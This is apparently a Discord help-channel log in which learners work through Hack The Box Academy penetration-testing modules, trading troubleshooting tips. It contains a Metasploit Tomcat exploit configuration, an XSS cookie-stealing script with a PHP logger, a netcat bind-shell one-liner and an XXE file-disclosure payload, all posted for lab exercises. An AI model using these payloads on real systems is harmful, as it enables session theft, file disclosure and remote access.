#modules
can someone help with the pivoting part in this question: Submit the contents of the flag.txt file on the Administrator desktop on MS01 (skills assessment 1 in the AD module)
Hey, I'm actually just searching for a good antivirus, is there anyone who can recommend me some please :o
Windows defender works just fine
Hi all. I'm new to this channel, HTB and Python. Who can assist with the block 2 question on Intro to Python? I don't understand why my answer is wrong. I input the following command: print(f'{num}') and in Kali it executed, which means it should be correct. Any advice is greatly appreciated, thanks in advance.
I-
What section?
Oh found it
Try the following command: pwd it should list the current path. hopefully that answers ur question but if not, sorry 🙂
You don't need to print(f'')
i don't think Windows Defender is enough since it has some bugs and is not able to detect malware as well as other antiviruses
My point is this channel isn't where to ask
thanks, I'll see what I can do. greatly appreciate it
Just print
You only need print(f'') if you're using strings of text alongside variables
okay 💗
the variable is {num}
No
Braces in printf tell python to interpret what's in them as either code or a variable and not literal text
The variable in the for loop is just num
is this the channel to ask for help on a module question?
Yes
Sweet! I am stuck on a question and I have no idea what the hay I am doing?
i even looked it up on google and it's not making sense to me
We don't necessarily need a preamble my guy
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
im stuck on this question
You should be able to find a forum post about this
I did on Google but a lot of the stuff they are talking about I don't understand. As for the module it is in, it didn't even talk about what cURL is at all
The third question in the HTB academy module Linux Fundamentals, in the Filter Content section, " Use cURL from your Pwnbox (not the target machine) to obtain the source code of “https://www.inlanefreight.com” website and filters all unique paths of that domain. Submit the number of these paths as the answer." I am stuck, I tried filtering out ...
man curl
Curl sends a request to a remote host that does various things depending on what you specify
the default is a get request and it often will get the source code of the page you visit
Does anybody remember what module in the pentester job path was talking about using base64 for defense evasion?
Probably file transfer
Anyone who is working on the Introduction to Windows Evasion Techniques, feel free to DM me. We can chat about it. Been working on it for a bit.
lfi i think
Lfi is late in the path, but that involves payloads within the browser
I found it - it was in the "Transferring Files" files section of the "Getting Started" module for those interested.
thank you. I understand what you mean now, thanks!
I'm currently working through the Skills assessment in the Information gathering - Web Edition module. The third question, "What is the API key in the hidden admin directory that you have discovered on the target system?" leaves me very confused. I have found 2 subdomains, and tried running ReconSpider against the second subdomain I found, it starts with "dev" and for some reason my results.json file won't give me any results. I thought the API key might be in the results from using ReconSpider but it's not there. Any tips, tricks, suggestions are appreciated.
I have also tried using curl against the second subdomain that I found, but curl doesn't seem to work against this subdomain
when reading dynamic, there is a way to stop the execution stack? it's annoying because I can't dump the right address https://academy.hackthebox.com/module/113/section/2139##About
I was able to answer the last two questions of the skills assessment. But the third answer makes no sense to me, I am looking for the admin directory in the robots.txt file but I tried just looking up robots.txt in the browser and get a 404 error
what shall i do if my xfreerdp doesn't want me to connect properly at all, and i mean like it times out
restart box
im using my linux system
instead since it's more efficient 4 me
i added /timeout:99999 and it's still done the same thing
times out after a bit, yeah i've like done everything
my vpn region is on the lowest ms possible
cant even complete shells and payload whilst it doing this
you won't find it in crawled output iirc
oh, actually im wrong, i think for that one you have to make sure you put the vhost in /etc/hosts before crawling with recon
Yeah I added the vhosts, both subdomains to the /etc/hosts file and was able to get the last two questions but the third question still has me stumped
go to ur browser and type the domain and then /robots.txt
I get a 404 error for the page when I do that
Ok
I finally got the robots.txt file, but have no idea how to access a disallowed directory/page
Ohhhhh I know what you mean
i mean, that robots.txt is just a suggestion to web crawlers "hey dont crawl this"
it being disallowed in robots.txt doesn't mean you cant access that directory
But I tried accessing the disallowed page from the browser and just got an error for some reason.
make sure your /etc/hosts subdomains are defined correctly
and try accessing that directory on the subdomains
Would curl be a good tool to get the answer?
Used Curl to get this. But tried to go to the moved location in the browser but no luck reaching the page
Figured it out!!
+1
Pentesting Job Path, Footprinting, MYSQL
Not sure why I can't connect from kali.
ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain
I'd advise a quick Google of the error message 🙂
I did no luck
i normally copy paste input and output on chatgpt
works from pwnbox
Could be there is a CA certificate missing from Kali that is present in Parrot then
not entirely sure, I'm thinking about just using Parrot while doing this course since I've run into quite a few errors related to the system
try --ssl-mode=DISABLED
kinda the 3rd or 4th issue ive had that "just works" on the pwn box
I just Googled the error message
Are you trying to put the password after the -p?
Second result
..but yes, this is likely due to a CA that is present in Parrot, that is not present in Kali
You don't need to put the password after -p
If you don't append it directly, it'll prompt for it
(which is for the best)
i use kali and never had that issue
This comes up as unknown variable
looking at the man to see if this is even a command
sounds like it's not
lemme try skip-ssl
skip ssl does work, uhh lemme see
mysql from 11.4.2-MariaDB, client 15.2 for debian-linux-gnu (x86_64) using EditLine wrapper
Ah, maria client
Yes, it’s true, it’s really a certificate problem
I know kali used maria but I thought they were pretty compatible between the two
Btw you don't need to use sudo for it
I'm looking at my notes and I did use a password there, but didn't need any special ssl parameters.
and to be totally transparent I am not just trying to "make it work" but trying to figure out whats going on with issues I keep encountering
Maybe try with the password
Or try putting -p last 🤔
ya ik and --skip-ssl does work
Also this "thread" is now here for future people who encounter this issue
--ssl-verify-server-cert
Enables server certificate verification. Prior to MariaDB 11.3, this option is disabled by default, otherwise enabled. Use --disable-ssl or --disable-ssl-verify-server-cert to revert to the pre-11.3 behavior.
from the mariadb most recent mysql client man
mariadb is a simple SQL shell with GNU readline capabilities.
...but yeah.. again, it's likely this is due to a CA or certificate missing in Kali that is present in the Pwnbox instance of Parrot
Since I have your attention, do you recommend using parrot while working through this course?
I think I would have run into that if that was the case, unless something changed with the module
I would like to minimize friction working on the course itself so I can focus on the content
Perhaps raise something in #1234357888114364508
You could just say you have issues connecting due to SSL verification under Kali, and link back to the start of this discussion
..if you don't want to type it all out
😄
What's happening here is that mysql is saying the server is using an unverifiable self-signed cert
Which I mean... yeah lol
If it helps you guys in anyway I'll make a post regarding it
Thanks 
How is everyone's studies going? Haven't been here in 12 months or so.
is there some way to find where it’s moved? or something else i’m meant to do to get the key?
Stuck on the Live Engagement module of Shells & Payloads (115/section/1139):
```
msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword Tomcatadm
msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 172.16.1.5
msf6 exploit(multi/http/tomcat_mgr_upload) > set LPORT 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOST 172.16.1.11
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit
```
Getting `Exploit aborted due to failure: unknown: Failed to execute the payload` after all this. Is there any way to get Metasploit to work properly here or does this *all* need to be done manually?
@smoky marten you're asking about the question about the new API key yes?
not the new api key, I found that one
use -L in curl
for it to follow the redirect
ohh ty
Was just going to say this.
I feel dumb now lmao
or just visit it in your browser (if you have the w* subdomain in your hosts file)
forgot it did that
btw your message that contained the subdomain was deleted, as the subdomain is meant to be found by you, so it's a spoiler
dude chill
i was resolving issue A first
alright sorry
figured it was good to just spoiler it but that makes sense
yeah you bumped your msg when like 4 other msgs were there lol.
i've had little luck with msfconsole and this module
like literally any time with the tomcat upload one it's failed for w/e reason
semi-related question, is there a way to get curl to display requested redirects without following them?
-I
see the header and usually 301 will tell you where it's going in the header
alright yea
that’s what I initially tried but it wasn’t in the header like usual so I got confused not knowing abt -L
Well I've tried to ||generate the .war file using msfvenom too|| — no dice there either. Perhaps there's a way to pollute the parameters, but Metasploit doesn't provide any documentation on what parameters they pass to their web shell to get the reverse shell to work — if they did, then it would be possible to use netcat to do what Metasploit can't. Alas, going to have to go back to an earlier section to see what happened to JSP because I had an issue that required reinstallation of Arch shortly after I was done with Getting Started, so all my notes from then are lost.
the manual method should work
make sure the LHOST= and LPORT= don't have spaces after
i.e. LHOST=<IP HERE> and LPORT=<PORT HERE> with no spaces
Update: got it.
Hey, brothers, should the academy’s startup range environment be optimized? I can’t open the laboratory.
At least 30 minutes
probably a browser issue, try hard refresh/cache clear
this channel is about academy on htb, maybe try hacker lounge or something
verify yourself first and try other channels
i already tried
Can you add a mechanism? It has not started successfully for more than 10 minutes. A reset button
nah that would only happen if services are degraded for some reason
their site does say they're having issues today, so it could be related. https://status.hackthebox.com/
more likely something on your end though if no one else is having issues
this is a known browser issue that occasionally happens where the request gets stuck and doesn't actually forward to the backend
it's silly
Thank you, how to solve this?
@fathom pendant Is there any discount on Black 5 CPTS?
Are you a premium user?
Broo I need a really good guide , can anyone please??
No, I'm just a Silver
Ohkiee
I am a beginner and I am learning ethical hacking but I am confused ... What should I do and what not
Can you please give me a real wayy
Hey, good brother
You should try to break through the wall and try to use a browser to search for information
If it doesn’t work, go back to discord
Yes
after the Linus what should I start???
what is your problem
target taking literal years to spawn
Hahaha, yes, it is recommended to optimize
Otherwise, customers will have to go to tryhackme
literally never heard of Black 5
but if you're asking if HTB does black friday sales, no
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
It's Black Friday, sorry, I used the abbreviation
Bro i am newbie but i have good cybersecurity knowledge and networking knowledge, I want to learn how to hack
@royal mist ^
Will that work???
Hey bro, my lab hasn't started yet
you will be an advanced hacker tomorrow
33
Wait , I'll check it out
hard refresh, change vpn regions, try again
OK This is my second attempt at switching VPNs
terminate the pwnbox then refresh and change vpns
i've seen that particular issue
it seems to be related to trying to send the signal to terminate the pwnbox so it can set the reconfigured VPN
weird
but yeah it's one of those things that you have to refresh the page after you terminate pwnbox
otherwise it still thinks it's spawned due to some caching
that was weird, my target server didn't spawn until i decided to start the pwnbox, it had been spinning for 30+ minutes, and as soon as i start the pwnbox it works

i didn't do it i swear
Lol
if it's a continuous issue for you; reach out to support so they can take a look into what the cause may be
@novel lynx hey , from which I should start ?
you have to go and buy a better router first, can't be a good hacker without a good router
bro start from Linux Fundamentals if u have no Linux experience
nah i've done some modules via tethering
i wouldn't recommend it personally
but it's possible
spite is powerful
I have a fine router , just tell me in the hackers Bible , what I should do first????
Start from the top
start with the beginning
You don’t read a book’s chapters as random
don't run before you walk
From Nmap? @fathom pendant
Did I understand correctly? source are the arguments that are sent to the web application and are temporarily saved in a variable in the browser's memory, and sink directly adds the given arguments to the page's DOM?
Thank you guys
source is what takes the argument, sink is what displays the result
Hey guys! I'm going through the setup module of the HTB academy atm.
I'm reading through all of the content thoroughly but am not sure if I should personally be installing everything they are going through in real time too?
The VM station, ParrotOS, VMware, Kali Linux etc
You can use your own machine (kali, parrot os or any other) and configure the vpn from there, or simply use the pwnbox and everything will be configured from there
Although I recommend you download Kali or Parrot in the virtual machine manager (Qemu, VirtualBox, VMware) that you like the most, configure OpenVPN and use the HTB VPN configuration file that you download if you want better performance.
what are everyone's thoughts on using GPT to help in your studies? for the most part i feel like i'm going to have access to GPT when i have a job in the field, so i feel like it's free game, just another tool
I like to use ChatGPT to bounce ideas off of, to sometimes build out some understanding of a bit of tech I've not used before, or to get some advice.
But
chatgpt is a powerful tool that can be very useful if you know how to use it
Don't take it at its word
It will get things wrong, and relying upon it too much will mean you become a prompt engineer
Not the thing you're studying for
😉
I use GitHub Copilot more, I think GPT is a good tool, but it also makes a lot of mistakes, it is more language-oriented than technical data-oriented, so it depends on how you use it.
(kinda joking, but I think it's a valid comment)
every mistake gpt makes is a learning experience though
If you can spot it yeah
most of the time i am unable to continue, so i know very quickly haha
🙂
also how am i supposed to know to type :wq to save a vim doc? gpt knows
nvim >
Having a "sidekick" is nice, but yeah.. I usually only use it to discuss random thoughts, to give an example of a starting point, or to try and explain a certain concept in a different way.
I am at section Skill Assessment in Windows attacks and defenses module.
When I RDP to the WS001, I can't login because "The trust relationship between this workstation and the primary domain failed.".
Please help
probably restart the target
unless you have DA powers then you can leave and rejoin the domain
I did twice, changed the VPN and the Pwnbox location too.
: (
When it asked you to trust the fingerprint, did you press yes?
Yes
it's an issue with the environment. if restarting didn't do it i'd open a ticket.
It's working now, nvm. I think I know the issue
This has happened to me before, Whenever you connect with parrot by mistake instead of kali, It messes up the trust relationship I guess. Idk why but it does. Then if you try to connect with kali, you have to reset a few times or wait for a long time.
smh not using vimtutor
vimtutor teaches you to zero --> hero your vim skills 🙏
i bet gpt could give me a great starting list of things to do in vim lol
vimtutor is literally a command that comes with vim installs
it teaches you the basics of navigating in vim
and handy shortcuts
like how a starts your insert after the current character, where i is before
It is true that when I ask the AI about how specific tools work, although it always tries to give an answer that works most of the time, it does not tell you the best one.
Also, a lot of times it just improvises and starts making things up.
and this behavior increases progressively according to the complexity of the question
yep
as it's not a search engine
the answer given is likely based off some forum post that gave some half-assed advice
or you're solving an xyproblem
^ this is a really good bit of read
there's a reason I nudge the question to it's root X problem instead of what Y is asked
especially if it seems odd
@quaint gate please refrain from posting screenshots of modules > t0; as well the Attacking Enterprise Networks module is done by many blind
Sorry , I figured that is in the actual module material
I jumped onto the pwnbox and struggled with the VMware installation. Is this because it's all already setup?
Ended up just downloading/ everything everything on my own local PC for now to keep myself rolling through the setup module
downloading/installing**
indeed the AEN module is the guide for it
you can't install vmware on the pwnbox
or at least you shouldn't be
the pwnbox IS already a vm
i thought so, thank you for the clarification
tom was more saying you can either:
- Set up a VM on your local PC
or 2. use pwnbox
besides
even if you could get it working on pwnbox, it'd just wipe when you reset it
I am sorry , I did mistake
just ask your question here:
Tips for getting your question answered;
Provide the module name - section name
Provide context on what you're having trouble with
Try and make sure your question hasn't already been answered by utilizing the search feature
Ohakyyy , thanku
hi, this is taking me a lot of time: python3 xsstrike.py -u http://94.237.53.xx:xxxxx/?fullname=hola&username=hola&password=hola&email=hola%40hola.hola
@vestal wing hi just a suggestion! adding a shebang to your ReconSpider.py (#!/usr/bin/env python) which should allow (with chmod +x) users to run the script without needing to specify python3 beforehand (just tested)
what module/section?
Cross-Site Scripting (XSS)
XSS Discovery
i don't recall XSS strike taking much time but I also didn't really utilize it too much
i have been like 40 minutes waiting
iirc there's some level of interactivity with it but also XSStrike isn't required to answer the questions
just do some manual testing to see if there's something you can manipulate
if it's taking a while do ctrl+c
I already have the answer but it bothers me that I can't do it myself.
open a PR
:p
It's not on gh
It's a direct download from academy
And panda is the one that wrote it :)
He meant Panda Request :p
Yeah... panda's tool isn't on gh... the ReconSpider on GH is different
Yeah true i was making a silly joke
Hey, I'm Doing some Linux fundamentals,
How can I use the find command when I want to find a .conf file that is between two sizes, like 20k and 25k?
Can i just use the size command again?
like find ...... -size +20K -size -25k?
Yes, that should work
You can also specify the name. So something like -name "*.conf"
Thanks I got it.
I thought maybe there was a way to put like -size 20-28k or something
Thanks much appreciated
Anyone for this section ?
I can’t dump the right memory yet I take the MAP -RW- but it can’t find an executable
The reading tells you explicitly which mem to dump for it, and yes it will match
Once dumped, you can run strings against it
The reason the screenshots and text is cutoff is bc it's exactly that way on the target
This section is, indeed, a guide
In x64dbg did you set the exit breakpoint?
yes I deactivated everything and left only the breakpoint option. the problem is that when I get to the card memory, as it's dynamic, everything moves, so I don't have time to dump a memory address.
when I use strings there is content but when I use the other de4dot tool it can't find the .NET header (so I guess MZ)
Hi mates, I hope you are all well. I am trying to find the existing exploit in MSF for https://academy.hackthebox.com/module/39/section/414 , does someone have a hint for me, which service I should focus on and what database to use for searching the exploit name? Thanks in advance for taking your time for a newbie. Just found the answer (NT AUTORITY******), but we all know cheating is not the way!
Why am I not getting a remote shell?
https://academy.hackthebox.com/module/67/section/912
I'm trying to solve this windows server module in windows privesc
I should get a shell after running the command
instead I'm getting ntlm hash
Hi, I am having trouble with the htb academy module HTTP Attacks Skills Assessment. Can I DM anyone? Ty
What trouble are you having exactly?
Can I DM you?
sure
greetings, I have question question for Cross-Site Scripting (XSS) , section session hijacking.
I got my script.js:
```javascript
document.location='http://10.10.15.105/index.php?c='+document.cookie;
new Image().src='http://10.10.15.105/index.php?c='+document.cookie;
```
and my index.php:
```php
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
```
and I keep getting:
```
[Fri Aug 23 12:59:31 2024] 10.129.32.115:35772 Closing
[Fri Aug 23 13:01:07 2024] 10.129.32.115:35816 Accepted
[Fri Aug 23 13:01:07 2024] 10.129.32.115:35816 [200]: GET /fullname/script-tag-type
```
payload on the web page is `"><script src=http://10.10.15.105/script.js></script>`
I see that the web page can get to the script, and I also used many other payloads but none of them write me a cookie. I also tried to use a port in script.js like IP:80/index.php but none works...

Looking at that log, I don't think it's getting the right resource from the server.
Your log should be saying something like GET /script.js with 200, not /fullname/script-tag-type
I can't get that response, it seems to me that the web page can't get to script.js and index.php and I don't know how
I mean the php server is running in the directory where script and index are
Yup, I can see that, I'm not able to spot what's wrong from everything that you have shared to be honest, should have worked. I wonder what's wrong
I read that port could be the issue, but in materials no one mention port. Also I tried some combinations but no luck
There's some debugging that you could try, DM?
sure
I'm reading through the ACL Enumeration page in Active Directory Enumeration & Attacks and I'm a bit confused on how they concluded that the user was damundsen that wley has control over, did they use powerView to find out who the CN was mapped to or is there something in the output that suggested this that I missed
About the Identifying SSRF module in Server-Side Attacks, I looked at || the hosts file and found an internal endpoint. I could send an http request there successfully, but I couldn't find the flag ||
Should I squint my eyes more?
Huh I solved it
The wording put me off
It was shown in bloodhound I believe
you can do that either by using BloodHound, or by PowerView (in that case you need to read the output carefully)
In a lot of the modules they provide lines of powershell and bash for searching through files, are we expected to remember these lines of code or just have them written down for later use? They are explaining what these lines do but i dont really know powershell and bash too well.
yes, you are expected to take notes so you can refer to them later
sometimes these commands work, sometimes not, why?
@fathom pendant any idea?
enable dynamic resolution
check maybe if server is online
it is
/cert:ignore idk what that does but maybe
nope
or whack the cache/config data for xfreerdp in your home directory. I think its under ~/.config/freerdp in Kali (note, not xfreerdp). You can use find to figure it out if it's not .config.
Hey there, Working on the Web Fuzzing section in Academy. I need to find the flag file from http://IP:PORT//webfuzzing_hidden_path/. I have found the directory but all the word lists i run dont find any files/
IDK then, there was that cert error, but w/o validating the cert I just see that "timeout waiting for activation"
maybe it’s not a default port
Never mind found it kicks rocks Stupid challenges
Is this a spoiler?
@shut vapor lol no
any idea how can i transfer file here ??
i am using smb impackt but
any method??
You tried to make a /drive on your xfreerdp which allows you to map a directory of your machine
/drive:data,/home/youruser
Thanks to this you will be able to transfer the data from the remote file through the xfreerdp socket on your local machine
Have you tried password protecting your share?
^
timeout
Also add /cert-ignore
Evil-winrm has a built-in upload/download feature
- Dont @ me, im not on demand
- Also don't share the pw since you had to crack it, that's a spoiler
i have added timeout
rdp connection bro
Oops sorry
Xfreerdp also has a /drive: feature
lol yet I told him ahah
Reminder here btw on that point, I'm not staff I just volunteer myself
ya but the thing is that i want to access other user in it and i can use runas and its working but i through drive when i am trying to access that user through GUI it asking for Admin pass
No
/drive:<sharename>,/path/to/directory/you/share
This mounts a directory with <sharename> on the computer
Under \\ts-client\sharename
It also works the other way around you can copy items both ways
Also you don't need to runas if you have the guy's password
Yes you need admin perms to mount the backup drive on the given host... but you can also mount it on your system
no like i rdp from a user account and now i do that rdp command with that path but here in that 1 found another user cred and now in that user there is a file i want to export
The first question in https://academy.hackthebox.com/module/31/section/599 asks about filetype, but every variation of answer is rejected, even after following the guided solution.
i cant thats the problem here bro
can you give the command you are running?
ok i copied it, now delete because spoilers
i'll test on my end, what section is this ?
That's a weird error that sometimes occurs with xfreerdp
tried to read up but a lot of in between noise xd
Password Attacks Lab - Hard
I assume in your post you redacted the rest of d* password
Because his pw definitely isn't 4 characters long
i deleted that pass because you said it's a spoiler
Yes
in this section someone managed to make the java executable work? https://academy.hackthebox.com/module/113/section/2164
Username is also a spoiler
guys i am at the beginning of academy, can anyone help me out?
Why are you putting it on your own machine?
Like the Java version on your machine doesn't match the Java version on the target
i am not understanding here how am i supposed to transfer that file in my system
The JRE on the target is 8.0.0 or something like that
I downloaded it from ftp and tried to run it on the remote windows.
My message about file transfer wasn't to you
Why?
It already exists on C:/apps
i can access the cmd of that user but when i try to send it saying error
Try remmina to remote in with d*
no working that user cant rdp
it's not the same size so the file on the ftp is fake lol
means no rights
Yes they can lol
I've literally rdp with them
bruhh why cant it give me permission then
¯\_(ツ)_/¯
remmina has functionality to transfer files? like xfreerdp?
just checked my notes look for other services that may be available since i'm assuming you didn't scan the host
that's why i don't recall having issues, didn't need to RDP
for transferring ??
yes
there's a port open on the target that you can connect to that has the file you're looking for
without the need for "runas" or any of that nonsense
scan the target with nmap
you'll see what I mean
rule 0 if the target is 10.129.x.x; never assume there's only the service mentioned on the host
always scan
please state your module, section and your problem. a nice touch would also to include what you've done so far
lol bro i check but i thought there would be a way to share the file as i can access the cmd of that user then you said rdp is ok lol i did finally
there are ways
File transfers covers that iirc
noo i dont think you can transfer in this case there are strict permissions
I was wrong. I misremembered, literally just checked my notes on how I did it
ah
There's a file sharing service running on the target
chill i was more dumb
i tried that but i tried to make a share then ...
You don't need to make a share
he just gave you a solid tip
but can we transfer ? like there may be any way?
module 4 setting up
There's one already running
^^
ya oops
linux PAM
That doesn't help us help you
ya i did
maybe the link then, because i can't do much with that
Do you mean the question of "what does PAM mean"?
Google is your friend
Good then you should have access to the file you need 👍
ya thanks and sorry for tagging
Guys can anyone suggest me what I shall do? Basically I used to practice hacking daily at home but now I have to leave home and work, rn I am around lots of people (my work friends) and I have to leave my setup back at home, what shall I do??? 😭😭
Cope
It's ok to take a break from this shit dude
Let your mind rest and absorb knowledge
hi guys sorry for the disorder, i'm on the SQLMap Essentials module, and i have not understood how i can recognize a suffix/prefix in a real-world scenario. Can anyone explain that to me?
Any chance of HTB getting a distribution center in the US. I want to start buying swag but paying 30 in shipping for 10-20 in stuff is a bit much
Submit to /feedback
hi, I got stuck on question 8, I did both mimikatz lsadump::lsa /inject and also hashdump (meterpreter) to get the SAM, but for the administrator the hash that I received was not suitable. I also did it via crackmapexec --lsa --local-auth, but did not get the necessary hashes (9 secrets received)
Module: Web Attacks
Section: Local File Disclosure
Link to section: https://academy.hackthebox.com/module/134/section/1204
What trick are they referring to here?
or attempt to utilize a hash stealing trick in Windows-based web applications, by making a call to our server.
guys so I'm on module windows evasion and to check on my own pc I forwarded port 8888 and listened with nc, suddenly I get an unknown IP connecting to me. Coincidence or a problem?
what are the steps to SSH?
The basic command is as follows:
ssh username@ip_address
It'll then prompt you for the password. If you need to specify the private key, use the -i option.
Thanks sooo much. i am really new to Linux
No worries. We've all been there.
Tip: check the man page for a tool/command or options like --help or -h.
They are probably referring to capturing the NTLM hashes. Which is why they say Windows-Based application.
But doing so with a call to the server? I don't believe that's been discussed so far in the CPTS path?
Also, it says "windows-based web application," so I was wondering if that had something to do with something from the browser?
https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/unc/ Here's something to read about but I've only done this on Network engagements where you upload it to the share. But, it says Windows Based web application, so the trick isn't far from probably uploading the same thing to a web application hosted on windows.
But, tbh, it's a guess from me. That's what I can think of. Hope someone with more clarity can clear this up more
I see. Thanks for sharing. It's an interesting attack regardless.
Basically setting up a server for the victim machine to execute the payload and call back to
In windows, generally, when a machine attempts to access resources, it sends along its ntlmv2 hash
Or well, the user in-context
It's similar to how you may use xp_dirtree to capture a hash with responder
Are you still stuck?
An account you compromised may have admin access
Don't overcomplicate things
After you've tried some things, if you are still stuck you can DM.
So... would the server we setup have to be an SMB server? Either ways, I don't really get why they mention it when all they've discussed at that point is information disclosure. They're just beginning to discuss RCE, and executing a command like connecting to server (callback), is RCE.
Or am I missing something? 🤔
Well yes
But that's just referring to in context of windows
Indeed lfi might lead to rce
Hey all. It's been a while. Possibly dumb question here.
I used sudo -l to see what commands I can run as my current user. The response was I can run a script called user2
How do I run that? like what is the syntax?
you are allowed to run /path/to/file as (user : group)
using sudo
okay. I think I did it, but it says the user2 command isn't found. Do I need to do user2:user2?
sudo user2 bash tries to run some file called user2
check your syntax, and check the section regarding sudo (i believe it's the Privilege Escalation section)
kk
is there any point in reaching out to support about a module target not responding or should i wait til status is green again? https://status.hackthebox.com/
Got it! It totally was up in the text wall of China above it. thanks! @dim wolf ❤️
this is why you take notes, silly protoss
(this message was endorsed by the Zerg Hivemind)
Anyone able to assist with Web Fuzzing Virtual Host and Subdomain Fuzzing? I am unable to find the "su" suffixed subdomain
tbh i just switch vpn regions
what is your fuzz syntax
IIRC try using different wordlists in /seclists/DNS
DM'd
and yeah use HOST header FUZZ.inlanefreight.htb with ffuf for vhost enumeration
My issue is they say to use the subdomain 5000 one
which module you on?
i did this a few weeks ago maybe, but i remember needing to use fierce wlist for one of the vhosts
this is the web fuzzing module
the one slated to replace the ffuf module in the cbbh path
I'm in Password Attacks-Passwd, Shadow & Opasswd
I already moved passwd.bak and shadow.bak from Will, over to my machine.
I unshadowed both .baks
Now I can't get hashcat or john to work.
Any help, please?
use hashcat locally from kali
thanks this fixed it!
Yes, that's what I did, as demonstrated in the module
what do you mean you can't get hashcat or john to work
Hi guys I am on the shell modules and I am having a little trouble on the bind shell part
here is the question
what's giving you trouble?
SSH to the target, create a bind shell, then use netcat to connect to the target using the bind shell you set up. When you have completed the exercise, submit the contents of the flag.txt file located at /customscripts.
refer to cheatsheet
repeating the question isn't helpful for us helping you
it helps us help you if you say what you tried
i managed to get a bind shell but when i type commands its just copying commands between the two shells
Nein! It's telling me No Hashes loaded.
I did:
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes mut_password.list
that's how nc works
but are you saying that it's not executing commands?
check format of unshadowed.hashes
i am trying to cd to customscripts but nothing happens
yeah not executing commands
yeah so what I did was I did nc -lvnp 7777 on the target host
and then i connected to it from my home shell
that's just telling it to listen, you're not piping any i/o to a shell command
I forgot to mention I added -o /tmp/unshadowed.cracked
Basically I used the same one disclosed in the module
so what do I do going forward?
because it did connect (listen) but when I try execute commands nothing happens
again
that's because you're not doing any piping
read the subsection titled "Establishing a Bind shell with Netcat"
stuff like | 2&>1...
sorry, i'm not following -
No Hashes loaded. means that for the module you've specified with hashcat, it doesn't recognize the format of the hash you're trying to crack.
piping in simple terms refers to redirecting i/o to another command
so you should probably make sure that the 'unshadowed' hash you're trying to crack with the module is in the correct format
such as
cat file | grep "word"
from what I recall this section has been a bit silly with trying to load the list
Redirections (Bash Reference Manual)
trying fierce now, thank you
you can try just loading the root line into its own file and cracking it
yep you helped a few weeks ago with it
this is the web fuzzing module yeah? fierce wordlist isn't required
practically every DNS wordlist used is a subdomains-top1million-*.txt
It is the Web Fuzz Module, yes.
literally ran it on my computer JUST NOW and got the su...inlanefreight.com subdomain
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l ip 7777 > /tmp/f
i put this command in my terminal but nothing happened
the ip is of the target
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
this is whats given in resources for bind shell
you're giving ip, instead of an actual ip
think about what you're doing with a bind shell
it sounds like you're running this locally instead of on the machine you're intended to SSH into
yeah I did that to protect my privacy 😅 I did in fact put the real ip
but yeah I managed to figure it out
thanks guys @hard matrix @fathom pendant
Found answer
Keep your goop to yourself! I just got through the second part as well. I'm a hackin' master! Ignite your psi blades and begin to hack!
Regarding this I don't understand why the email field shouldn't be tested, couldn't the conditions simply be bypassed so that they are commented or something? Tip: We will notice that the email must match an email format, even if we try manipulating the HTTP request parameters, as it seems to be validated on both the front-end and the back-end. Hence, the email field is not vulnerable, and we can skip testing it. Likewise, we may skip the password field, as passwords are usually hashed and not usually shown in cleartext. This helps us in reducing the number of potentially vulnerable input fields we need to test.
Likewise with the password
if there is adequate input validation and sanitization, it's a parameter you can't really test because your input will be sanitized
but there are possibilities to be able to bypass it as well
yes but for the sake of simplicity
let's assume that there's proper input sanitization on the backend that would not allow it
if it's inadequate, you can bypass it. but most email parameters i've tested have adequate validation and sanitization
and, of course, you don't want to waste your time on something like that when there are possibly other vulnerabilities on the web app
I was thinking of some more sophisticated bypass but I guess ignoring those fields is fine for now, thanks
that's illegal and against discord TOS
if you're referring to hacking a discord server to give roles, that's extra illegal
yes and the roles are open
but idk how to give me it
<@&861185840277487616>
this channel is specifically regarding getting help with HTB academy modules
@stable fossil bye bye
not helping skids hack discord servers
bro its my friend
don't care
this server is not about hacking discord servers. Period
end of discussion
do not pass go
do not collect $200
im albanian
ok and?
k
Discord is a US based company
we dont have dollars
thats not sigma
neither is hacking a discord server my guy
if you wanna learn go ask google for tips and tricks, surely that will go well
but this server is not about hacking other discord servers, which is against Discord ToS
don't be rude, thank you
I'm currently doing "Web Attacks - Advanced file Disclosure" module. Can you tell me why it is not showing the proper response as seen on the module?
I did this to create the file:
Kojin@htb[/htb]$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
Kojin@htb[/htb]$ python3 -m http.server 8000
Here's my other syntax:
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://10.10.16.8:8000/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
I even applied:
<email>&joined;</email> <!-- reference the &joined; entity to print the file content -->
I can't seem to get the expected output as seen in the module.
Hi mates, if i have a question about 'SEA', can i ask here? i really don't get the xss,js triggered
#1271890150863143096 read and follow #welcome to access
no access
see literally the message above this
read and follow #welcome to access
Imagine being the guy who developed Tomcat 
i mean it's mostly because if you have admin panel access to tomcat, or cgi access
it's gg
with tomcat manager/admin panel access -> upload .war file and it's gg no-re
No
Crazy
Question, in the ssh pivoting with Sshuttle, what is the username we use to get access to the linux pivot machine?
